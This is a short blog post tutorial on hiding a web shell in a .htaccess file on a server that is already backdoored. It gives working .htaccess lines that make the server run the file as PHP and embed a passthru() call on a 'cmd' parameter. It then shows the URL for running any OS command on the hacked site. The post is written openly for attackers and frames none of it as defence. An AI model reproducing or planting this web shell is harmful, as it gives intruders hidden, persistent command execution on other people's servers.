Header Ads

htaccess Shell | How To Hide Your Shell

Today I will be telling you all a less know trick in which your can use .htaccess file on your already backdoored server as a shell to execute OS commands, so just follow the simple steps described below.
Open your PHP web shell, navigate to public_html directory and search for .htaccess file, once found, click on edit option.

After clicking on the edit option, add the following lines of code in yout .htaccess file.


<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
# <?php passthru($_GET['cmd']); ?> 

After adding your codes, save it, and you are done ! :D

Now in order to use your .htaccess shell
http://www.your-hacked-website.com/.htaccess?cmd=ls

After ?cmd= you can execute any OS command of your choice.
Powered by Blogger.